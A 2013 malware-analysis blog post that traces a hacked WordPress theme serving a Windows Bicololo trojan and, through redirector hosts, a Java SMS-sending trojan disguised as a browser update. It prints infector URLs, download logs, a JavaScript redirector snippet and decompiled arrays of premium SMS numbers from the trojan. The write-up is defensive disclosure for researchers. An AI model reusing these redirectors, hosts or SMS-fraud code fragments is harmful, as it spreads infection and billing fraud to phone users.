Friday, January 11, 2013

A double hit - PC Trojan W32/VBS Bicololo and Mobile Java Android/Trojan SMS Apps via a hacked Wordpress site

Wordpress is a very useful blog sites, it has many useful features in its themes & plugins, a world wide popularity and yet also famous of its tons of vulnerabilities in the supported plugins and themes. This story is about a Wordpress site that got hacked and being used to serve malware infections, not only to the PC that accessed it, but also infection malware for the mobile devices too.
Here we go!
Recognizing the infection pattern reported in UrlQuery below:
http://urlquery.net/report.php?id=678590
Bumped us to a large amount (hundreds) of malware infector URLs:
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=YQfpcUvsYV
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xvGoLsqGhV
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xxuMdywDDk
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=VMmujweIUQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=uxsBosuiCw
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=TxtyywoBdy
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=UImqwXIMoh
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=tEeWvHTtYn
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=RfkOKspdvC
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=qwBQIWUwOM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pPNhxcgVJk
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pIYmBHGgee
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pBhEkPUQqf
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=OHRLfRUvGK
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=nvDLJcwTuQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=msvIMqjIdB
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=Luncwlsxkw
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LvGpxhVGuS
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lVlRWCfJvd
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lLcsskMdbK
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LprlKrYScJ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=kqbeUHWYWb
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KqqjBhNpeM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LFGtIvwBnQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KpOuJWkLhY
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KfObcIdoVm
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=IkxUNXUHeP
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HYxgeMlwsp
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=hlwfpHMCMM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HcOGfViMqN
    :
    :
It is the vulnerable Wordpress with Theme "Stroy/Red Stroy" injected - with malware download URL in random made script at fake "akismeet.php" script. I think the theme was made in Russia.

The PC Threat

Shortly, we fetched the sample:
Resolving inbuildhouse.ru... seconds 0.00, 178.236.176.74
Caching inbuildhouse.ru => 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... seconds 0.00, connected.
  :
GET /wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:02 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
  :
302 Found
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA [following]
Skipping 0 bytes of body: [] done.
--20:46:10--  h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
           => `update.php@q=PHOTO-DEVOCHKA'
Reusing existing connection to inbuildhouse.ru:80.
  :
GET /wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:03 GMT
Content-Type: application/octet-stream
Content-Length: 184243
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Accept-Ranges: bytes
Content-disposition: attachment; filename="PHOTO-DEVOCHKA.exe"
  :
200 OK
Length: 184,243 (180K) [application/octet-stream]
20:46:13 (78.58 KB/s) - `PHOTO-DEVOCHKA.exe' saved [184243/184243]
We got the sample which turned out to be a Trojan VBS Win32/Bicololo. Below is the Virus Total scan result:
SHA1: f05b0a6734391f19838bdcb41d29d173a1d45b02 MD5: f54715875c3327953965072927e86bd0 File size: 179.9 KB ( 184243 bytes ) File name: GOLAYA-BABE.exe File type: Win32 EXE Tags: peexe bobsoft Detection ratio: 11 / 44 Analysis date: 2013-01-11 12:51:39 UTC ( 5 minutes ago ) URL --->>[VirusTotal] Malware Names: GData : VBS:Bicololo-BG TrendMicro-HouseCall : TROJ_GEN.F47V0111 Avast : VBS:Bicololo-BG [Trj] Kaspersky : UDS:DangerousObject.Multi.Generic Jiangmin : Trojan/StartPage.bim Malwarebytes : Trojan.StartPage.ooo Panda : Trj/Qhost.MR Ikarus : Trojan.Win32.Qhosts Kingsoft : Win32.Troj.Undef.(kcloud) TheHacker : Trojan/Bicololo.a Microsoft : Trojan:Win32/QHosts.BF
Virus Total & (ESET) made a good description and analysis about this trojan. Our analysis result-->>[HERE] (matched to the ESET Bicololo Trojan description). Below is the network traffic we captured (click to enlarge)

The Mobile Threat

The story is not ending yet, the hacked site was filled with other infectors. we accidentally found this link:
inbuildhouse.ru/wp-content/themes/stroy/
Then we followed it...
=> `inbuildhouse.ru/wp-content/themes/stroy/index.html'
Resolving inbuildhouse.ru... 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: h00p://mampoks.ru [following]
--20:59:13--  h00p://mampoks.ru/
           => `mampoks.ru/index.html'
Resolving mampoks.ru... 195.128.18.244
Connecting to mampoks.ru|195.128.18.244|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 369 [text/html]
20:59:13 (11.45 MB/s) - `mampoks.ru/index.html' saved [369/369]
to be forwarded to OTHER (mampoks.ru) infector. And download the index.html of that infector instead, which containing - a redirector script to ANOTHER HOST's landing page at ktozdesj.ru↓
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32">
Your browser will download:
Resolving ktozdesj.ru... seconds 0.00, 93.170.107.130
Caching ktozdesj.ru => 93.170.107.130
Connecting to ktozdesj.ru|93.170.107.130|:80... seconds 0.00, connected.
GET /l.php?l=o&r=9578&a=32 HTTP/1.0
Referer: h00p://inbuildhouse.ru/wp-content/themes/stroy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: ktozdesj.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:01:13 GMT
Content-Type: text/html
Content-Length: 5307
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; expires=Fri, 
11-Jan-2013 13:01:13 GMT; path=/; domain=.localhost
200 OK
Length: 5,307 (5.2K) [text/html]
21:01:21 (105.95 MB/s) - `l.php' saved [5307/5307]
Which having malicious link below:
ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32
PoC:
$ grep "getfile" 1.php

l.php(24):  <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32"><img src="landings/images/opera/images/mobile-logo.png" alt="ミ榧アミスミセミイミサミオミスミクミオ Opera Mini"></a>
l.php(35):  <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="tab-link">
l.php(66):  <form action="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" method="post" class="close">
l.php(80):  <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオム€ム・クム・7.0</a></p>
l.php(84):  <a class="art-opn" href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" title="ミ榧アミスミセミイミク ム・イミセム・Opera!" target="_blank">
l.php(139): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオム€ム・クム・7.0</a></p>
If your browser is mobile/Android you will be redirected to these url↑ And what's this lead us to?
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:14:09 GMT
Content-Type: application/java-archive
Content-Length: 251481
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; expires=Fri, 11-Jan-2013 13:14:09 GMT; path=/; domain=.localhost
Content-Disposition: attachment; filename="browser_update_install.jar"
Yes, another jar payload "browser_update_install.jar".
File Info:
browser_update_install.jar 2013/01/11 21:16 251,481 45078333eb39116c154899d3bf5501e8
We analized the code to find malicious SMS sending functions-->>[HERE] Yes, it sends SMS for the international used to specific numbers, with supporting international code to call: Some number to reach...
public final class k
{ private static String[] a = { "79202909090", "79206909090", "79219909090", "79222909090", "79232909090", "79242000690", "79262909090", "79272909090", "79282000002", "79289900028", "89282000002" };
  private static String[] b = { "79168999100", "79168960220", "79116009993", "79114009993", "73434800248", "79147991000", "79147991000", "79106609999", "79135330003", "79168999800", "79139869990", "79107459999", "79171002003", "79171002003", "79112009993", "70957699100", "70957699101", "70957699102", "70957699800", "79027899999", "79029889991", "79104999104", "79107899999", "79126313456", "79128800003", "79128900003", "79129200003", "79168999101", "79168999102" };
  private static String[] c = { "7922", "7929", "7932" };
   :
   :
static
 {{ "79037011111", "73339077000", "77059077000", "790173100", "79033619502" }[5] = "79037011110";
  { "7901630", "7901631", "7901632", "7901633", "79016340", "79016341", "79016342", "79016343", "79016344", "7901640", "7901641", "790165", "790166", "7901670", "7901671", "7901672", "7901673", "7901674", "790217", "7902510", "7902511", "7902512", "7902513", "7902514", "7902515", "7902516", "7902519", "790254", "7902560", "7902561", "7902566", "7902567", "7902568", "7902569", "7902576", "7902577", "7902578", "7902579", "790276", "790411", "790412", "790413", "790414", "790415", "790864", "790865", "790866", "795005", "795006", "795007", "795008", "795009", "795010", "795011", "795012", "795013", "795014", "795261", "795262" }[59] = "795263";
    d = new String[] { "7701", "7702", "7775", "7778", "73009300300", "73009300301" };
    e = new String[] { "7908228", "7908229", "795297", "795298", "790219", "7902285", "7902286", "7902504", "7902507", "795025", "7950660", "7950661", "7950962", "7950963", "795225", "795230", "795326", "795393", "790408", "790409", "790453", "790878", "795071", "795113", "795114", "795115", "795176", "795242", "795243", "7900355", "7900356", "7900357", "7900358", "7900359", "790036", "7900370", "7900371", "7900372", "7900373", "7900374", "795069", "795296", "795327", "795328", "795329", "7902147", "7902148", "7902149", "7902283", "7902284", "7908225", "7908226", "7908291", "7908292", "7908293", "7908294", "7908295", "795068", "795172", "795248", "795390", "79004735", "79004736", "79004737", "79004738", "79004739", "7900474", "7900475", "7900476", "7900477", "7900478", "7900479", "7900480", "7900481", "7900482", "79004830", "79004831", "79004832", "79004833", "79004834", "790403", "790425", "7904260", "7904261", "790459", "790465", "7904857", "7904858", "7904859", "7904955", "7904956", "7904957", "7904958", "7904959", "795173", "795174", "795350", "795351", "7953520", "7953521", "7953522", "7953523", "7953524", "7900300", "7900301", "7900302", "7900303", "7900304", "7900305", "7900306", "7900307", "7900308", "7900309", "7904210", "7904211", "7904212", "7904213", "7904214", "790813", "790814", "795075", "795076", "795077", "795154", "795155", "795156", "795185", "795186", "795187", "795210", "795254", "795255", "7904245", "7904246", "7904247", "7904248", "7904249", "7904275", "7904276", "7904277", "7904278", "7904279", "790431", "790483", "795015", "795016", "795017", "795081", "795082", "795083", "795119", "795120", "795121", "795240", "795241", "79534115", "79534116", "79534117", "79534118", "79534119", "7900345", "7900346", "7900347", "7900348", "7900349", "7900350", "7900351", "7900352", "7900353", "7900354", "7902250", "7902251", "7902252", "7908290", "795067", "795205", "795211", "795279", "795331", "795332", "795333", "795346", "790437", "790457", "790496", "790499", "790894", "790895", "795026", "795027", "795057", "795058", "795059", "795116", "795117", "795118", "795157", "795158", "795159", "795160", "795161", "7952165", "7952166", "7952167", "7952168", "7952169", "7952170", "7952171", "7952172", "7952173", "7952174", "7953059", "7953060", "7953061", "7953062", "7953063", "7953064", "7953065", "7953066", "7953067", "7953068", "790052", "7951347", "7951348", "7951349", "7951350", "7951351", "7951352", "7951353", "7951354", "7951355", "7951356", "795313", "795367", "795368", "795369", "795394", "795024", "795364", "795365", "795366", "7900229", "790023", "790024", "790025", "790026", "790027", "790028", "7900290", "7900291", "7900292", "7900293", "7900294", "7900295", "7900296", "7900297", "7900298", "7902403", "7902404", "7902405", "7902406", "7902407", "7902408", "790867", "790868", "7908690", "7908691", "7908692", "7908693", "795281", "795282", "795283", "795284", "795285", "795286", "795287", "7953069", "795307", "795308", "795309", "795310", "7953110", "7953111", "7953112", "7953113", "7953114", "7953115", "7953116", "7953117", "7953118", "79534110", "79534111", "79534112", "79534113", "79534114", "790452", "790812", "795087", "795107", "795108", "795131", "795132", "795133", "795249", "7904218", "7904219", "790428", "790429", "790468", "790469", "795080", "795130", "795259", "790213", "7902281", "7902282", "7908605", "7908606", "7908607", "795089", "7951295", "7951296", "7951297", "795229", "795330", "795375", "7952314", "790404", "790405", "790406", "790439", "790815", "790816", "790823", "795060", "795061", "795062", "795244", "795245", "795276", "795277", "795278", "795355", "795356", "795357", "795136", "795137", "795138", "795139", "795290", "795291", "795292", "795293", "795294", "795376", "795377", "795378", "795379", "795380", "7953857", "7953858", "7953859", "795386", "795387", "795388", "7953890", "7953891", "7953892", "7953893", "7953894", "7953895", "7953896", "790407", "790432", "790458", "790482", "790810", "790811", "790831", "790879", "790880", "795021", "795033", "795078", "795079", "795095", "795140", "795141", "795142", "795339", "795347", "795361", "795362", "795381", "7900455", "7900456", "7900457", "7900458", "7900459", "7900460", "7900461", "7900462", "7900463", "7900464", "7953525", "7953526", "7953527", "7953528", "7953529", "795353", "795354", "795175", "795323", "795324", "7953250", "7953251", "7953252", "7953253", "7953254", "790434", "790444", "790450", "790817", "790818", "790819", "790850", "790851", "795084", "795085", "795086", "795149", "795150", "795151", "795152", "795153", "795182", "795183", "795184", "795256", "795257", "795258", "795260", "795110", "795212", "795373", "795374", "790433", "790451", "790455", "790460", "790461", "790463", "790464", "795000", "795001", "795002", "795003", "795004", "795022", "795164", "795165", "795166", "795167", "795168", "795220", "795221", "795222", "795223", "795224", "795226", "795227", "795228", "795235", "795236", "795237", "795238", "795239", "795314", "795315", "795316", "795317", "795334", "795335", "795336", "795337", "7900219", "7900220", "7900221", "7900222", "7900223", "7900224", "7900225", "7900226", "7900227", "7900228", "790436", "790828", "795070", "795169", "795170", "795171", "795253", "795299", "790410", "790420", "790422", "790423", "7904270", "7904271", "7904272", "7904273", "7904274", "790486", "7908328", "7908329", "7908715", "7908716", "7908717", "7908718", "7908719", "7950308", "7950565", "7950566", "7950567", "7950568", "7950569", "795312", "795370", "795371", "795372", "79004715", "79004716", "79004717", "79004718", "79004719", "7900472", "79004730", "79004731", "79004732", "79004733", "79004734", "790400", "790401", "790402", "790435", "795206", "795215", "7952160", "7952161", "7952162", "7952163", "7952164", "7952175", "7952176", "7952177", "7952178", "7952179", "7952180", "7952181", "7952182", "7952183", "7952184", "795280", "795288", "795289", "795391", "795392", "795090", "795091", "795092", "7952015", "7952016", "7952017", "7952018", "7952019", "7952185", "7952186", "7952187", "7952188", "7952189", "795318", "795319", "7953419", "795342", "795343", "7953440", "7953441", "7953442", "7953443", "795395", "795396", "7953970", "7953971", "7953972", "7953973", "7953974", "790430", "790497", "790804", "790805", "790806", "790857", "790858", "795072", "795073", "795074", "795111", "795112", "795144", "795145", "795146", "795147", "795148", "795177", "795178", "795179", "795180", "795181", "795250", "795251", "795252" };
    { "38050", "38095", "38066" }[3] = "38099";
    { "790208", "7902200", "7902203", "7902204", "7902205", "7902206", "7902207", "7902208", "7902209", "790234", "7902352", "7902353", "7902354", "79047299", "790852", "790853" }[16] = "795023";
    f = new String[] { "7705", "7777", "7771" };  }}
Some country code...
jdField_a_of_type_JavaUtilHashtable.put("7840", "ab");
jdField_a_of_type_JavaUtilHashtable.put("7940", "ab");
jdField_b_of_type_JavaUtilHashtable.put("994", "az");
jdField_b_of_type_JavaUtilHashtable.put("213", "alzhir");
jdField_b_of_type_JavaUtilHashtable.put("374", "am");
jdField_b_of_type_JavaUtilHashtable.put("375", "by");
jdField_b_of_type_JavaUtilHashtable.put("359", "bolgaria");
jdField_b_of_type_JavaUtilHashtable.put("387", "bosniaigerc");
jdField_b_of_type_JavaUtilHashtable.put("502", "gvatemala");
jdField_b_of_type_JavaUtilHashtable.put("504", "gonduras");
jdField_b_of_type_JavaUtilHashtable.put("852", "gonkong");
jdField_b_of_type_JavaUtilHashtable.put("972", "israel");
jdField_b_of_type_JavaUtilHashtable.put("962", "iordania");
jdField_b_of_type_JavaUtilHashtable.put("855", "kambodzha");
Virus Total checks shows:
MD5: 45078333eb39116c154899d3bf5501e8 File size: 245.6 KB ( 251481 bytes ) File name: browser_update_install.jar File type: JAR Tags: jar Detection ratio: 31 / 46 Analysis date: 2013-01-11 12:17:18 UTC ( 1 hour, 58 minutes ago ) URL --->>[VirusTotal] Malware Names: MicroWorld-eScan : Trojan.Java.Smssend.W nProtect : Trojan.Java.Smssend.W CAT-QuickHeal : Trojan.JavaExploit McAfee : Generic.dx!bfzk K7AntiVirus : Trojan F-Prot : Java/SMSer.L Symantec : Trojan.Gen.2 Norman : SMSSend.CX TotalDefense : Java/SMSTroj.Q TrendMicro-HouseCall : TROJ_GEN.FCBHZIK Avast : Java:SMSSend-GF [Expl] ClamAV : Android.Trojan.Smssend-7 Kaspersky : Trojan-SMS.J2ME.Jifake.my BitDefender : Trojan.Java.Smssend.W NANO-Antivirus : Trojan.SmsSend.wgugf Sophos : Troj/Jifake-A Comodo : UnclassifiedMalware F-Secure : Trojan.Java.Smssend.W DrWeb : Java.SMSSend.780 AntiVir : JAVA/Badorg.BA TrendMicro : JAVA_SMSAGE.NT Emsisoft : Trojan.Java.Smssend.W (B) Jiangmin : Trojan/AndroidOS.afcr Microsoft : Trojan:Java/SMSer.AY ViRobot : J2ME.A.Jifake.2840 GData : Trojan.Java.Smssend.W Commtouch : Java/SMSer.L ESET-NOD32 : a variant of J2ME/TrojanSMS.Agent.DH Ikarus : JAVA.SMSSend Fortinet : Java/SMSBoxer.AQ!tr AVG : Java/SMS.OO

Research Materials

To the fellow researchers & AV industry, samples & analysis data is-->>[HERE]
#MalwareMustDie